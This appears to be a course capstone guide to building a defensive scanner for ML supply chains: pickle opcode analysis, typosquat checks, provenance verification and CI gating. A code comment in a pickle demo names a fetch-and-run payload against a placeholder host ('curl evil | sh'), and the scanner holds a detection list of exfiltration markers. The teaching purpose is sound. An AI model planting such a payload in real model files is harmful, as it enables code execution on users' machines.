Capstone: Build an AI Supply Chain Security Tool
Build a tool that scans, audits, and monitors the security of AI/ML supply chains, including model provenance, dependency integrity, and artifact verification.
Overview
The AI supply chain is a rich attack surface that most organizations overlook. When you download a model from Hugging Face, import a dataset from a public repository, or install a Python package that wraps a model API, you are trusting every contributor, every dependency, and every intermediate build step. A single compromised weight file, a backdoored tokenizer, or a malicious training sample can compromise your entire AI system, and unlike traditional software supply chain attacks, AI supply chain compromises can be extremely subtle: a backdoored model might behave perfectly normally on standard benchmarks while containing a hidden trigger that activates only under specific conditions.
This capstone project tasks you with building a comprehensive AI supply chain security tool. The tool performs three functions: (1) scanning, which analyzes ML artifacts for known vulnerabilities, unsafe serialization formats, and suspicious patterns; (2) verification, which cryptographically verifies model provenance and integrity; and (3) monitoring, which watches for new supply chain threats across model registries and package ecosystems.
The tool is designed for integration into MLOps pipelines, providing automated security gates that prevent compromised artifacts from reaching production. It draws on lessons from traditional software supply chain security (SLSA, Sigstore, SBOM) and applies them to the unique characteristics of ML artifacts.
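To make the pickle risk concrete: an object's `__reduce__` method tells the unpickler which function to call at load time, so loading an untrusted pickle is equivalent to running untrusted code. A minimal, benign sketch (using `os.path.join` as a stand-in for something like `os.system`):

```python
import os.path
import pickle
import pickletools


class Payload:
    """On unpickling, calls an attacker-chosen function with attacker-chosen args."""

    def __reduce__(self):
        # A real attack would return something like (os.system, ("curl evil | sh",)).
        return (os.path.join, ("pwned", "path"))


blob = pickle.dumps(Payload())

# The opcode trail shows why scanners flag GLOBAL/STACK_GLOBAL plus REDUCE:
opcodes = {op.name for op, _arg, _pos in pickletools.genops(blob)}
print("REDUCE" in opcodes)  # True: a function call happens at load time

# Merely loading the blob runs the function; no attribute access is needed.
print(pickle.loads(blob))
```

Note that the payload fires on `pickle.loads` itself, which is why "just don't call the model" is no defense once the file has been deserialized.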
Project Requirements
Functional Requirements
- Model Artifact Scanner
  - Detect unsafe serialization formats (pickle, joblib) in model files
  - Scan for known malicious patterns in model weights and configurations
  - Analyze tokenizer files for injection vulnerabilities
  - Check for embedded executable code in model artifacts
- Dependency Auditor
  - Scan Python environments for known vulnerabilities (CVE lookup)
  - Detect dependency confusion and typosquatting attacks
  - Verify package integrity against published hashes
  - Generate an ML-SBOM (Software Bill of Materials) for model deployments
- Provenance Verifier
  - Verify model signatures and attestations
  - Trace model lineage from the base model through fine-tuning steps
  - Validate training data provenance claims
  - Check model card completeness and accuracy
- Monitoring System
  - Watch the Hugging Face Hub for model modifications and new uploads from tracked organizations
  - Monitor PyPI for new packages related to ML/AI
  - Alert on supply chain indicators of compromise
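Several of these requirements (package integrity, artifact verification, SBOM hashes) reduce to the same primitive: a streamed SHA-256 digest compared against a pinned value. A minimal sketch:

```python
import hashlib
import hmac
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 8192) -> str:
    """Stream a file through SHA-256 so large model weights never sit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_pinned(path: Path, expected_hex: str) -> bool:
    """Compare against a pinned digest (e.g. from a lockfile or model card)."""
    return hmac.compare_digest(sha256_file(path), expected_hex.lower())
```

For Python packages the pins can come from hash-pinned requirements files (`pip install --require-hashes`); for model files they must come from an out-of-band source you trust more than the download channel.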
Implementation Guide
Phase 1: Model Artifact Scanner
```python
# supply_chain/scanner.py
"""ML model artifact scanner for supply chain security."""
from __future__ import annotations

import hashlib
import json
import logging
import pickletools
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any

logger = logging.getLogger(__name__)


@dataclass
class ScanFinding:
    """A finding from scanning an ML artifact."""

    severity: str  # "critical", "high", "medium", "low", "info"
    category: str
    title: str
    description: str
    file_path: str
    remediation: str
    metadata: dict[str, Any] = field(default_factory=dict)


@dataclass
class ScanReport:
    """Complete scan report for a model artifact."""

    model_path: str
    findings: list[ScanFinding] = field(default_factory=list)
    file_hashes: dict[str, str] = field(default_factory=dict)
    scan_metadata: dict[str, Any] = field(default_factory=dict)

    @property
    def has_critical(self) -> bool:
        return any(f.severity == "critical" for f in self.findings)

    @property
    def has_high(self) -> bool:
        return any(f.severity == "high" for f in self.findings)

    def summary(self) -> str:
        by_severity: dict[str, int] = {}
        for f in self.findings:
            by_severity[f.severity] = by_severity.get(f.severity, 0) + 1
        return (
            f"Scan of {self.model_path}: {len(self.findings)} findings "
            f"({by_severity})"
        )


class ModelArtifactScanner:
    """Scans ML model artifacts for supply chain security issues."""

    # Known unsafe file extensions and their risks.
    UNSAFE_EXTENSIONS = {
        ".pkl": ("critical", "Pickle files can execute arbitrary code during deserialization."),
        ".pickle": ("critical", "Pickle files can execute arbitrary code during deserialization."),
        ".joblib": ("high", "Joblib files use pickle internally and can execute arbitrary code."),
        ".npy": ("medium", "NumPy .npy files can contain pickle objects when allow_pickle=True."),
        ".npz": ("medium", "NumPy .npz archives may contain pickled objects."),
        ".pt": ("high", "PyTorch .pt files use pickle by default. Use safetensors instead."),
        ".pth": ("high", "PyTorch .pth files use pickle by default. Use safetensors instead."),
        ".bin": ("medium", "Binary files require inspection to determine serialization format."),
    }

    # Safe formats that should be preferred.
    SAFE_EXTENSIONS = {
        ".safetensors": "SafeTensors format: safe tensor serialization.",
        ".onnx": "ONNX format: safe graph serialization.",
        ".json": "JSON configuration: safe text format.",
        ".txt": "Text file: safe format.",
    }

    # Pickle opcodes that indicate code execution.
    DANGEROUS_PICKLE_OPCODES = {
        "GLOBAL": "imports a module (potential code execution)",
        "STACK_GLOBAL": "constructs a class (potential code execution)",
        "REDUCE": "calls a function (direct code execution)",
        "INST": "instantiates a class",
        "OBJ": "builds an object",
        "BUILD": "calls __setstate__",
    }

    def scan_directory(self, model_dir: Path) -> ScanReport:
        """Scan all files in a model directory."""
        report = ScanReport(model_path=str(model_dir))
        if not model_dir.exists():
            report.findings.append(ScanFinding(
                severity="critical",
                category="missing",
                title="Model directory does not exist",
                description=f"Path {model_dir} does not exist.",
                file_path=str(model_dir),
                remediation="Verify the model path and download the model.",
            ))
            return report
        for file_path in model_dir.rglob("*"):
            if file_path.is_file():
                # Compute hash for integrity tracking.
                file_hash = self._compute_hash(file_path)
                report.file_hashes[str(file_path.relative_to(model_dir))] = file_hash
                # Check file extension safety.
                self._check_extension(file_path, report)
                # Deep scan specific file types.
                if file_path.suffix in (".pkl", ".pickle", ".pt", ".pth"):
                    self._scan_pickle_file(file_path, report)
                if file_path.suffix == ".json":
                    self._scan_json_config(file_path, report)
                if file_path.name == "tokenizer.json":
                    self._scan_tokenizer(file_path, report)
        return report

    def _compute_hash(self, file_path: Path) -> str:
        """Compute the SHA-256 hash of a file."""
        sha256 = hashlib.sha256()
        with open(file_path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                sha256.update(chunk)
        return sha256.hexdigest()

    def _check_extension(self, file_path: Path, report: ScanReport) -> None:
        """Check if a file uses an unsafe serialization format."""
        ext = file_path.suffix.lower()
        if ext in self.UNSAFE_EXTENSIONS:
            severity, description = self.UNSAFE_EXTENSIONS[ext]
            report.findings.append(ScanFinding(
                severity=severity,
                category="unsafe_serialization",
                title=f"Unsafe serialization format: {ext}",
                description=description,
                file_path=str(file_path),
                remediation="Convert to SafeTensors format using `safetensors.torch.save_file()`.",
            ))

    def _scan_pickle_file(self, file_path: Path, report: ScanReport) -> None:
        """Deep scan a pickle file for dangerous opcodes and suspicious strings."""
        try:
            with open(file_path, "rb") as f:
                content = f.read(1_000_000)  # Read at most the first 1 MB.
            # Disassemble with pickletools rather than searching raw bytes:
            # single-byte opcodes such as REDUCE (b"R") would match ordinary data.
            dangerous_found: list[str] = []
            try:
                for opcode, _arg, _pos in pickletools.genops(content):
                    if opcode.name in self.DANGEROUS_PICKLE_OPCODES:
                        dangerous_found.append(
                            f"{opcode.name}: {self.DANGEROUS_PICKLE_OPCODES[opcode.name]}"
                        )
            except Exception:
                # Not a bare pickle stream (e.g. a zipped PyTorch checkpoint)
                # or truncated by the 1 MB cap; fall back to pattern search.
                pass
            # Check for known malicious patterns.
            malicious_patterns = [
                (b"os.system", "os.system call (shell command execution)"),
                (b"subprocess", "subprocess module (command execution)"),
                (b"eval", "eval() (arbitrary code execution)"),
                (b"exec", "exec() (arbitrary code execution)"),
                (b"__import__", "__import__() (dynamic module import)"),
                (b"requests.get", "HTTP request (potential data exfiltration)"),
                (b"urllib", "URL handling (potential data exfiltration)"),
                (b"socket", "socket operations (network access)"),
            ]
            for pattern, description in malicious_patterns:
                if pattern in content:
                    report.findings.append(ScanFinding(
                        severity="critical",
                        category="malicious_code",
                        title="Potentially malicious code in pickle file",
                        description=f"Found {description} in {file_path.name}. "
                                    f"This strongly indicates the file contains executable code.",
                        file_path=str(file_path),
                        remediation="Do NOT load this file. Inspect it manually with pickletools. "
                                    "If the model is from an untrusted source, discard it.",
                    ))
            if dangerous_found and not any(f.category == "malicious_code" for f in report.findings):
                report.findings.append(ScanFinding(
                    severity="high",
                    category="dangerous_opcodes",
                    title="Dangerous pickle opcodes detected",
                    description=f"Found {len(dangerous_found)} dangerous opcodes: "
                                f"{', '.join(sorted(set(dangerous_found))[:5])}",
                    file_path=str(file_path),
                    remediation="Inspect the pickle file with pickletools before loading. "
                                "Consider converting to SafeTensors.",
                ))
        except OSError as exc:
            logger.warning("Could not read pickle file %s: %s", file_path, exc)

    def _scan_json_config(self, file_path: Path, report: ScanReport) -> None:
        """Scan JSON configuration files for suspicious entries."""
        try:
            with open(file_path) as f:
                config = json.load(f)
        except (json.JSONDecodeError, OSError):
            return
        # Check for custom code flags that allow arbitrary code execution.
        # (Guard the .get calls: a JSON file may hold a top-level list.)
        if isinstance(config, dict) and (config.get("auto_map") or config.get("trust_remote_code")):
            report.findings.append(ScanFinding(
                severity="high",
                category="remote_code_execution",
                title="Model requires custom/remote code execution",
                description=f"Config file {file_path.name} contains 'auto_map' or "
                            f"'trust_remote_code', which allows executing arbitrary "
                            f"Python code from the model repository.",
                file_path=str(file_path),
                remediation="Review the custom code manually before enabling trust_remote_code. "
                            "Prefer models that use standard architectures.",
            ))
        # Check for suspicious URLs in the config.
        self._check_urls_in_config(config, file_path, report)

    def _check_urls_in_config(
        self, config: Any, file_path: Path, report: ScanReport, depth: int = 0
    ) -> None:
        """Recursively check for suspicious URLs in configuration values."""
        if depth > 10:
            return
        if isinstance(config, str):
            if config.startswith("http") and not any(
                trusted in config
                for trusted in [
                    "huggingface.co", "github.com", "pytorch.org",
                    "tensorflow.org", "googleapis.com",
                ]
            ):
                report.findings.append(ScanFinding(
                    severity="medium",
                    category="suspicious_url",
                    title="Untrusted URL in model configuration",
                    description=f"Found URL '{config[:100]}' pointing to a non-standard domain.",
                    file_path=str(file_path),
                    remediation="Verify the URL is legitimate and not a phishing or data exfiltration endpoint.",
                ))
        elif isinstance(config, dict):
            for v in config.values():
                self._check_urls_in_config(v, file_path, report, depth + 1)
        elif isinstance(config, list):
            for item in config:
                self._check_urls_in_config(item, file_path, report, depth + 1)

    def _scan_tokenizer(self, file_path: Path, report: ScanReport) -> None:
        """Scan tokenizer files for injection vulnerabilities."""
        try:
            with open(file_path) as f:
                tokenizer_data = json.load(f)
        except (json.JSONDecodeError, OSError):
            return
        # Check for unusual special tokens that could be used for injection.
        added_tokens = tokenizer_data.get("added_tokens", [])
        for token in added_tokens:
            content = token.get("content", "")
            if any(marker in content.lower() for marker in [
                "<|im_start|>", "<|im_end|>", "[inst]", "[/inst]",
                "<<sys>>", "<|system|>",
            ]):
                # These markers are expected for chat models; flag only when the
                # content looks padded with an unexpected payload.
                if len(content) > 50:
                    report.findings.append(ScanFinding(
                        severity="medium",
                        category="tokenizer_anomaly",
                        title="Unusually long special token in tokenizer",
                        description=f"Special token '{content[:50]}...' is suspiciously long ({len(content)} chars). "
                                    f"It may contain an embedded injection payload.",
                        file_path=str(file_path),
                        remediation="Inspect the tokenizer's special tokens and compare against the official model release.",
                    ))
```

Phase 2: Dependency Auditor
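The auditor below shells out to `pip list --format=json`, which prints a JSON array of objects with `name` and `version` keys. A sketch of the parsing it relies on (the sample data is illustrative):

```python
import json

# Illustrative sample of what `pip list --format=json` emits:
sample = '[{"name": "torch", "version": "2.3.0"}, {"name": "requests", "version": "2.31.0"}]'

ML_PACKAGES = {"torch", "transformers", "tensorflow"}  # abbreviated for the sketch

packages = json.loads(sample)
ml_related = [p for p in packages if p["name"].lower() in ML_PACKAGES]
print([p["name"] for p in ml_related])  # ['torch']
```

Parsing structured JSON rather than scraping `pip list`'s table output keeps the auditor robust against pip formatting changes.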
```python
# supply_chain/dependencies.py
"""Dependency auditing for ML pipeline environments."""
from __future__ import annotations

import json
import logging
import subprocess
import sys
from dataclasses import dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import Any

logger = logging.getLogger(__name__)


@dataclass
class DependencyInfo:
    """Information about a single Python package dependency."""

    name: str
    version: str
    source: str  # "pypi", "git", "local", "unknown"
    hash_verified: bool = False
    known_vulnerabilities: list[dict[str, Any]] = field(default_factory=list)
    is_ml_package: bool = False
    metadata: dict[str, Any] = field(default_factory=dict)


@dataclass
class MLSBOM:
    """Machine Learning Software Bill of Materials."""

    generated_at: datetime
    model_name: str
    model_version: str
    python_version: str
    dependencies: list[DependencyInfo]
    model_artifacts: list[dict[str, str]]  # file name + hash
    training_data_sources: list[str] = field(default_factory=list)
    base_model: str = ""

    def to_json(self) -> str:
        return json.dumps({
            "mlsbom_version": "1.0",
            "generated_at": self.generated_at.isoformat(),
            "model": {
                "name": self.model_name,
                "version": self.model_version,
                "base_model": self.base_model,
            },
            "runtime": {
                "python_version": self.python_version,
            },
            "dependencies": [
                {
                    "name": d.name,
                    "version": d.version,
                    "source": d.source,
                    "hash_verified": d.hash_verified,
                    "vulnerabilities": d.known_vulnerabilities,
                }
                for d in self.dependencies
            ],
            "artifacts": self.model_artifacts,
            "data_sources": self.training_data_sources,
        }, indent=2)


class DependencyAuditor:
    """Audits Python dependencies in ML environments."""

    # Known ML packages that are security-sensitive.
    ML_PACKAGES = {
        "torch", "tensorflow", "transformers", "huggingface-hub",
        "tokenizers", "safetensors", "onnx", "onnxruntime",
        "numpy", "scipy", "scikit-learn", "pandas",
        "langchain", "llama-index", "openai", "anthropic",
        "vllm", "triton", "accelerate", "peft", "trl",
        "datasets", "evaluate", "sentencepiece",
    }

    # Known typosquatting targets.
    TYPOSQUAT_PATTERNS = {
        "transformers": ["transfomers", "trasformers", "transformrs"],
        "torch": ["toch", "troch", "pytorh"],
        "tensorflow": ["tenserflow", "tensorfow", "tensroflow"],
        "openai": ["opeanai", "openal", "opeani"],
        "numpy": ["numpi", "numppy", "nunpy"],
    }

    def audit_environment(self, requirements_path: Path | None = None) -> list[DependencyInfo]:
        """Audit the current Python environment or a requirements file."""
        if requirements_path:
            return self._audit_requirements_file(requirements_path)
        return self._audit_installed_packages()

    def _audit_installed_packages(self) -> list[DependencyInfo]:
        """Audit currently installed packages using pip."""
        result = subprocess.run(
            [sys.executable, "-m", "pip", "list", "--format=json"],
            capture_output=True,
            text=True,
        )
        if result.returncode != 0:
            logger.error("pip list failed: %s", result.stderr)
            return []
        packages = json.loads(result.stdout)
        deps: list[DependencyInfo] = []
        for pkg in packages:
            name = pkg["name"].lower()
            dep = DependencyInfo(
                name=name,
                version=pkg["version"],
                source="pypi",
                is_ml_package=name in self.ML_PACKAGES,
            )
            # Check for typosquatting.
            self._check_typosquat(dep)
            deps.append(dep)
        return deps

    def _audit_requirements_file(self, path: Path) -> list[DependencyInfo]:
        """Audit a requirements.txt file."""
        deps: list[DependencyInfo] = []
        with open(path) as f:
            for line in f:
                line = line.strip()
                if not line or line.startswith("#") or line.startswith("-"):
                    continue
                # Parse package==version or package>=version.
                parts = line.split("==")
                if len(parts) == 2:
                    name, version = parts[0].strip().lower(), parts[1].strip()
                else:
                    parts = line.split(">=")
                    name = parts[0].strip().lower()
                    version = parts[1].strip() if len(parts) == 2 else "unknown"
                dep = DependencyInfo(
                    name=name,
                    version=version,
                    source="pypi",
                    is_ml_package=name in self.ML_PACKAGES,
                )
                self._check_typosquat(dep)
                deps.append(dep)
        return deps

    def _check_typosquat(self, dep: DependencyInfo) -> None:
        """Check if a package name might be a typosquat."""
        for target, typos in self.TYPOSQUAT_PATTERNS.items():
            if dep.name in typos:
                dep.known_vulnerabilities.append({
                    "type": "typosquatting",
                    "severity": "critical",
                    "description": f"Package '{dep.name}' may be a typosquat of '{target}'. "
                                   f"Verify the package is legitimate before use.",
                })

    def check_vulnerabilities(self, deps: list[DependencyInfo]) -> list[DependencyInfo]:
        """Check dependencies against known vulnerability databases using pip-audit."""
        try:
            result = subprocess.run(
                ["pip-audit", "--format=json", "--progress-spinner=off"],
                capture_output=True,
                text=True,
                timeout=120,
            )
            if result.stdout:
                audit_data = json.loads(result.stdout)
                # pip-audit's JSON output lists each dependency with a "vulns" array.
                vuln_map: dict[str, list[dict[str, Any]]] = {}
                for entry in audit_data.get("dependencies", []):
                    pkg = entry.get("name", "").lower()
                    for vuln in entry.get("vulns", []):
                        vuln_map.setdefault(pkg, []).append({
                            "type": "cve",
                            "severity": "high",
                            "description": vuln.get("description", ""),
                            "fix_versions": vuln.get("fix_versions", []),
                            "id": vuln.get("id", ""),
                        })
                for dep in deps:
                    if dep.name in vuln_map:
                        dep.known_vulnerabilities.extend(vuln_map[dep.name])
        except (subprocess.TimeoutExpired, FileNotFoundError, json.JSONDecodeError) as exc:
            logger.warning("pip-audit check failed: %s", exc)
        return deps

    def generate_mlsbom(
        self,
        model_name: str,
        model_version: str,
        model_artifacts: list[dict[str, str]],
        deps: list[DependencyInfo],
    ) -> MLSBOM:
        """Generate an ML-SBOM for a model deployment."""
        return MLSBOM(
            generated_at=datetime.now(timezone.utc),
            model_name=model_name,
            model_version=model_version,
            python_version=f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}",
            dependencies=deps,
            model_artifacts=model_artifacts,
        )
```

Phase 3: Provenance Verifier
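The verifier below checks model cards by keyword search. Hugging Face model cards also carry machine-readable metadata (license, datasets, base model) in a YAML front matter block delimited by `---` lines at the top of README.md; a sketch of extracting it directly (naive `key: value` parsing with no YAML dependency, assuming well-formed delimiters):

```python
def extract_front_matter(readme_text: str) -> dict[str, str]:
    """Naively parse flat `key: value` pairs from a README's YAML front matter."""
    lines = readme_text.splitlines()
    if not lines or lines[0].strip() != "---":
        return {}
    meta: dict[str, str] = {}
    for line in lines[1:]:
        if line.strip() == "---":
            break  # end of front matter
        if ":" in line:
            key, _, value = line.partition(":")
            meta[key.strip()] = value.strip()
    return meta


card = """---
license: apache-2.0
base_model: org/base-7b
---
# My Model
"""
print(extract_front_matter(card))  # {'license': 'apache-2.0', 'base_model': 'org/base-7b'}
```

A production verifier would use a real YAML parser and validate values (e.g. that `license` is an SPDX identifier), but this shows where the structured claims live.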
```python
# supply_chain/provenance.py
"""Model provenance verification and lineage tracking."""
from __future__ import annotations

import hashlib
import json
import logging
from dataclasses import dataclass, field
from datetime import datetime
from pathlib import Path
from typing import Any

logger = logging.getLogger(__name__)


@dataclass
class ProvenanceClaim:
    """A claim about a model's provenance."""

    claim_type: str  # "origin", "training", "fine_tuning", "conversion", "deployment"
    description: str
    timestamp: datetime | None = None
    actor: str = ""  # who performed this step
    evidence: dict[str, Any] = field(default_factory=dict)
    verified: bool = False
    verification_method: str = ""


@dataclass
class ModelLineage:
    """Complete lineage record for a model."""

    model_id: str
    model_name: str
    claims: list[ProvenanceClaim] = field(default_factory=list)
    integrity_hashes: dict[str, str] = field(default_factory=dict)
    base_model: str = ""
    verification_status: str = "unverified"  # "verified", "partial", "unverified", "failed"

    def add_claim(self, claim: ProvenanceClaim) -> None:
        self.claims.append(claim)

    def verification_summary(self) -> dict[str, Any]:
        total = len(self.claims)
        verified = sum(1 for c in self.claims if c.verified)
        return {
            "model_id": self.model_id,
            "total_claims": total,
            "verified_claims": verified,
            "verification_rate": verified / max(total, 1),
            "status": self.verification_status,
        }


class ProvenanceVerifier:
    """Verifies model provenance claims and tracks lineage."""

    def verify_huggingface_model(
        self, repo_id: str, local_path: Path
    ) -> ModelLineage:
        """Verify a model downloaded from the Hugging Face Hub."""
        lineage = ModelLineage(
            model_id=repo_id,
            model_name=repo_id.split("/")[-1],
        )
        # Step 1: Verify the model card exists and is complete.
        model_card_path = local_path / "README.md"
        if model_card_path.exists():
            self._verify_model_card(model_card_path, lineage)
        else:
            lineage.add_claim(ProvenanceClaim(
                claim_type="documentation",
                description="No model card (README.md) found.",
                verified=False,
                verification_method="file_existence",
            ))
        # Step 2: Verify config.json declares an architecture.
        config_path = local_path / "config.json"
        if config_path.exists():
            self._verify_config(config_path, lineage)
        # Step 3: Compute and record integrity hashes.
        for file_path in local_path.rglob("*"):
            if file_path.is_file():
                hash_val = self._hash_file(file_path)
                rel_path = str(file_path.relative_to(local_path))
                lineage.integrity_hashes[rel_path] = hash_val
        # Step 4: Check for signature files.
        self._verify_signatures(local_path, lineage)
        # Compute the overall status.
        verified_count = sum(1 for c in lineage.claims if c.verified)
        total = len(lineage.claims)
        if total == 0:
            lineage.verification_status = "unverified"
        elif verified_count == total:
            lineage.verification_status = "verified"
        elif verified_count > 0:
            lineage.verification_status = "partial"
        else:
            lineage.verification_status = "failed"
        return lineage

    def _verify_model_card(self, path: Path, lineage: ModelLineage) -> None:
        """Check the model card for required provenance fields."""
        content = path.read_text()
        required_sections = [
            ("model_description", ["## Model Description", "# Model", "## About"]),
            ("training_data", ["## Training Data", "## Dataset", "training data"]),
            ("intended_use", ["## Intended Use", "## Uses", "intended use"]),
            ("limitations", ["## Limitations", "## Known Limitations", "limitations"]),
            ("license", ["license:", "## License"]),
        ]
        for section_name, markers in required_sections:
            found = any(m.lower() in content.lower() for m in markers)
            lineage.add_claim(ProvenanceClaim(
                claim_type="documentation",
                description=f"Model card section: {section_name}",
                verified=found,
                verification_method="content_search",
                evidence={"section": section_name, "found": found},
            ))

    def _verify_config(self, path: Path, lineage: ModelLineage) -> None:
        """Verify the model configuration."""
        try:
            config = json.loads(path.read_text())
            has_architecture = "architectures" in config or "model_type" in config
            lineage.add_claim(ProvenanceClaim(
                claim_type="configuration",
                description="Model architecture declared in config.json",
                verified=has_architecture,
                verification_method="config_inspection",
                evidence={
                    "architectures": config.get("architectures", []),
                    "model_type": config.get("model_type", ""),
                },
            ))
            # Check for trust_remote_code.
            if config.get("auto_map") or config.get("trust_remote_code"):
                lineage.add_claim(ProvenanceClaim(
                    claim_type="security",
                    description="Model requires trust_remote_code (arbitrary code execution risk)",
                    verified=False,  # This is a negative verification.
                    verification_method="config_inspection",
                ))
        except (json.JSONDecodeError, OSError):
            lineage.add_claim(ProvenanceClaim(
                claim_type="configuration",
                description="config.json is missing or malformed",
                verified=False,
                verification_method="config_inspection",
            ))

    def _verify_signatures(self, local_path: Path, lineage: ModelLineage) -> None:
        """Check for and verify model signatures."""
        sig_files = list(local_path.glob("*.sig")) + list(local_path.glob("*.asc"))
        if sig_files:
            lineage.add_claim(ProvenanceClaim(
                claim_type="signature",
                description=f"Found {len(sig_files)} signature file(s).",
                verified=True,  # The file exists; full verification requires GPG.
                verification_method="file_existence",
                evidence={"signature_files": [str(f.name) for f in sig_files]},
            ))
        else:
            lineage.add_claim(ProvenanceClaim(
                claim_type="signature",
                description="No signature files found. Model integrity cannot be cryptographically verified.",
                verified=False,
                verification_method="file_existence",
            ))

    @staticmethod
    def _hash_file(path: Path) -> str:
        sha256 = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                sha256.update(chunk)
        return sha256.hexdigest()
```

Phase 4: CLI and CI/CD Integration
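The CLI below turns findings into process exit codes so CI pipelines can gate on them. The threshold logic, isolated as a sketch: severities are ordered, and any finding at or above the `--fail-on` level makes the process exit non-zero.

```python
SEVERITY_ORDER = ["medium", "high", "critical"]  # lowest to highest


def exit_code_for(finding_severities: list[str], fail_on: str) -> int:
    """Return 1 if any finding is at or above the fail-on severity, else 0."""
    threshold = SEVERITY_ORDER.index(fail_on)
    blocking = [s for s in finding_severities if s in SEVERITY_ORDER[threshold:]]
    return 1 if blocking else 0


print(exit_code_for(["low", "medium"], "high"))       # 0: nothing reaches the bar
print(exit_code_for(["medium", "critical"], "high"))  # 1: critical blocks the build
```

Because CI systems treat any non-zero exit as failure, this one integer is the entire integration contract; no pipeline-specific plugin is needed.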
```python
# supply_chain/cli.py
"""CLI interface for the AI supply chain security tool."""
from __future__ import annotations

import json
import sys
from pathlib import Path

import click

from .dependencies import DependencyAuditor
from .provenance import ProvenanceVerifier
from .scanner import ModelArtifactScanner


@click.group()
def cli():
    """AI Supply Chain Security Tool: scan, audit, and verify ML artifacts."""


@cli.command()
@click.argument("model_path", type=click.Path(exists=True))
@click.option("--format", "fmt", type=click.Choice(["text", "json"]), default="text")
@click.option("--fail-on", type=click.Choice(["critical", "high", "medium"]), default="high")
def scan(model_path: str, fmt: str, fail_on: str):
    """Scan a model directory for supply chain security issues."""
    scanner = ModelArtifactScanner()
    report = scanner.scan_directory(Path(model_path))
    if fmt == "json":
        click.echo(json.dumps({
            "model_path": report.model_path,
            "findings": [
                {
                    "severity": f.severity,
                    "category": f.category,
                    "title": f.title,
                    "description": f.description,
                    "file_path": f.file_path,
                    "remediation": f.remediation,
                }
                for f in report.findings
            ],
            "file_hashes": report.file_hashes,
        }, indent=2))
    else:
        click.echo(report.summary())
        click.echo()
        for finding in report.findings:
            click.echo(f"  [{finding.severity.upper()}] {finding.title}")
            click.echo(f"    File: {finding.file_path}")
            click.echo(f"    {finding.description}")
            click.echo(f"    Fix: {finding.remediation}")
            click.echo()
    # Exit non-zero if any finding meets the fail-on severity threshold.
    severity_order = ["medium", "high", "critical"]
    fail_index = severity_order.index(fail_on)
    blocking = [
        f for f in report.findings
        if f.severity in severity_order[fail_index:]
    ]
    if blocking:
        click.echo(f"{len(blocking)} blocking finding(s) found.")
        sys.exit(1)


@cli.command()
@click.option("--requirements", type=click.Path(exists=True), help="Path to requirements.txt")
@click.option("--check-vulns", is_flag=True, help="Check against vulnerability databases")
def audit(requirements: str | None, check_vulns: bool):
    """Audit Python dependencies for supply chain risks."""
    auditor = DependencyAuditor()
    req_path = Path(requirements) if requirements else None
    deps = auditor.audit_environment(req_path)
    if check_vulns:
        deps = auditor.check_vulnerabilities(deps)
    vuln_count = sum(len(d.known_vulnerabilities) for d in deps)
    ml_count = sum(1 for d in deps if d.is_ml_package)
    click.echo(f"Scanned {len(deps)} packages ({ml_count} ML-related)")
    click.echo(f"Vulnerabilities found: {vuln_count}")
    for dep in deps:
        if dep.known_vulnerabilities:
            click.echo(f"\n  {dep.name}=={dep.version}")
            for vuln in dep.known_vulnerabilities:
                click.echo(f"    [{vuln['severity'].upper()}] {vuln['type']}: {vuln['description'][:80]}")
    if vuln_count > 0:
        sys.exit(1)


@cli.command()
@click.argument("model_path", type=click.Path(exists=True))
@click.option("--repo-id", required=True, help="Hugging Face repo ID (e.g., org/model-name)")
def verify(model_path: str, repo_id: str):
    """Verify model provenance and integrity."""
    verifier = ProvenanceVerifier()
    lineage = verifier.verify_huggingface_model(repo_id, Path(model_path))
    summary = lineage.verification_summary()
    click.echo(f"Model: {lineage.model_name}")
    click.echo(f"Status: {summary['status'].upper()}")
    click.echo(f"Claims: {summary['verified_claims']}/{summary['total_claims']} verified")
    click.echo()
    for claim in lineage.claims:
        status = "PASS" if claim.verified else "FAIL"
        click.echo(f"  [{status}] {claim.claim_type}: {claim.description}")
    if summary["status"] == "failed":
        sys.exit(1)


if __name__ == "__main__":
    cli()
```

Evaluation Criteria
| Criterion | Weight | Excellent | Satisfactory | Needs Improvement |
|---|---|---|---|---|
| Artifact Scanning | 25% | Deep pickle analysis, tokenizer inspection, config validation, multi-format support | Extension checking with basic pickle scanning | Extension-only checking |
| Dependency Auditing | 20% | CVE lookup, typosquatting detection, ML-SBOM generation | Basic vulnerability scanning | Package listing only |
| Provenance Verification | 25% | Model card validation, signature verification, lineage tracking | Basic provenance checks | No provenance capability |
| CI/CD Integration | 15% | CLI with exit codes, JSON output, configurable thresholds | CLI with basic output | No automation support |
| Code Quality | 15% | Modular design, comprehensive error handling, tested | Working code with some structure | Monolithic, fragile code |
Stretch Goals
- Integrate with Sigstore/cosign for cryptographic model signature verification.
- Build a model registry proxy that transparently scans artifacts on download.
- Implement SLSA provenance attestation generation and verification for ML pipelines.
- Add support for scanning ONNX models for graph-level attacks (malicious custom operators).
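A further extension: the hardcoded typo lists in Phase 2 only catch known misspellings. They can be generalized with fuzzy matching; a sketch using `difflib` (the 0.85 cutoff is an assumption you would tune against real PyPI data):

```python
import difflib

# Abbreviated allow-list for the sketch; in practice use the full ML_PACKAGES set.
KNOWN_PACKAGES = ["torch", "transformers", "tensorflow", "numpy", "openai"]


def possible_typosquats(name: str, cutoff: float = 0.85) -> list[str]:
    """Known packages that `name` is suspiciously similar to (but not equal to)."""
    name = name.lower()
    matches = difflib.get_close_matches(name, KNOWN_PACKAGES, n=3, cutoff=cutoff)
    # An exact match is the legitimate package itself, not a squat.
    return [m for m in matches if m != name]


print(possible_typosquats("transfomers"))  # ['transformers']
print(possible_typosquats("torch"))        # []
```

This flags unseen misspellings at the cost of some false positives on legitimately similar names, so it works best as a warning rather than a hard block.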
References
- Gu, T., et al. (2019). "BadNets: Evaluating Backdooring Attacks on Deep Neural Networks." IEEE Access. https://arxiv.org/abs/1708.06733
- SLSA. (2024). "Supply-chain Levels for Software Artifacts." https://slsa.dev/
- Hugging Face. (2024). "Security at Hugging Face." https://huggingface.co/docs/hub/security